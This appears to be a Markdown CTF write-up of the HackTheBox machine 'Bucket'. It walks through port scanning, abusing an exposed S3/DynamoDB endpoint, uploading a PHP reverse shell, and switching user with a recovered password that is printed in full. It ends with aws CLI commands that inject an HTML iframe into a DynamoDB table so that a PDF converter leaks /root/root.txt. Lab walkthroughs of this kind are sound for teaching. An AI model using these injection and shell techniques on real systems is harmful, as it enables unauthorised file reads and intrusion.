CTF-Writeups/HackTheBox/Bucket.md
2021-03-21 17:17:25 +05:00

7.7 KiB

HackTheBox-Bucket

Rustscan

rustscan -a 10.10.10.212 -- -A -sC -sV                                                            
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.                                                                                            
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |                  
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |                  
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'                  
The Modern Day Port Scanner.                                              
________________________________________                                  
: https://discord.gg/GFrQsGy           :                                                                                                            
: https://github.com/RustScan/RustScan :                                  
 --------------------------------------                                                                                                             
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan
[~] The config file is expected to be at "/root/.rustscan.toml"                                                                                     
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 10.10.10.212:22                 
Open 10.10.10.212:80  

PORT   STATE SERVICE REASON         VERSION                               
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)                                                             
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.41                   
| http-methods:                                                           
|_  Supported Methods: GET HEAD POST OPTIONS                              
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://bucket.htb/ 
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port                                               
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete                                                                   
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 2.6.32 (94%), ASUS RT-N56U WAP 
(Linux 3.4) (93%), Linux 3.16 (93%), Adtran 424RG FTTH gateway (92%), Linux 2.6.39 - 3.2 (92%), Linux 3.1 - 3.2 (92%), Linux 3.2 - 4.9 (92%)
No exact OS matches for host (test conditions non-ideal).                                                  

PORT 80

It's using a domain name so we are going to add that to /etc/hosts

Notice that we don't see images , the reason behind it is that it's retreiving the image from s3.bucket.htb

Running dirsearch against that

If we visit s3.bucket.htb/shell

But adding / makes a difference

s3.bucket.htb/shell/

Reading the documentation to list tables

 var params = {
 };
 dynamodb.listTables(params, function(err, data) {
   if (err) console.log(err, err.stack); // an error occurred
   else     console.log(data);           // successful response
 });

We have a found a table name users , to view the data from the table

var params = {
    TableName:"users"};

docClient.scan(params, (error, result) => {
    if (error) {
      console.log('error', error);
    } else {
      console.log(result.Items); // x items
    }
});

Tried using these credentials through ssh but failed

Also running wfuzz on http://s3.bucket.htb/shell/ didn't returned anything intersting

So after spending so much time I realized tha I could also list the tables using aws cli

We needed to setup the credentials and the region first also to note that our end point url will be http://s3.bucket.htb

We can view the tables from here as well

Honestly did not know what I was doing until I ran aws s3 ls again

Here we can see index.html , if we visit s3.bucket.htb/adserver/index.html, it will be the same as bucket.htb so this means if we upload a php reverse shell on the bucket which is adserver we can access that from bucket.htb

That reverse shell is uploaded also keep it my mind to access that quickly because s3 bucket is going to remove it

We can switch user to roy with the password n2vM-<_K_Q:.Aa2 also if we look for open ports we can find port 8000 is running as http so we can do port forwarding with chisel

On our machine

On target machine

We can also find bucket-app in /var/www

Looking at index.php it's using dynamodb client to iterate contents of alerts table and then reading it and storing it to a pdf using pd4ml which converts html and css to pdf

So we need to create a table first

aws dynamodb create-table \
    --table-name alerts \
    --attribute-definitions \
        AttributeName=title,AttributeType=S \
        AttributeName=data,AttributeType=S \
    --key-schema \
        AttributeName=title,KeyType=HASH \
        AttributeName=data,KeyType=RANGE \
--provisioned-throughput \
        ReadCapacityUnits=10,WriteCapacityUnits=5 --endpoint-url 'http://s3.bucket.htb'

Now we need to insert the data

aws dynamodb put-item \                                                                                                                           
    --table-name alerts \                                                                                                                       
    --item '{
        "title": {"S": "Ransomware"},
        "data": {"S": "<html><head></head><body><iframe src='/root/root.txt'></iframe></body></html>"}
      }' \                                                                                                          
    --return-consumed-capacity TOTAL --endpoint-url http://s3.bucket.htb

Now doing a POST request with action=get_alerts

curl --data "action=get_alerts" -X POST http://127.0.0.1:8000

Note : The converted pdf file will get removed also the table so you need to be quick here to get the file

I started a python http server

And we got the root flag , although I was able to get the private ssh key but couldn't make it in a proper format so I just left having a root hash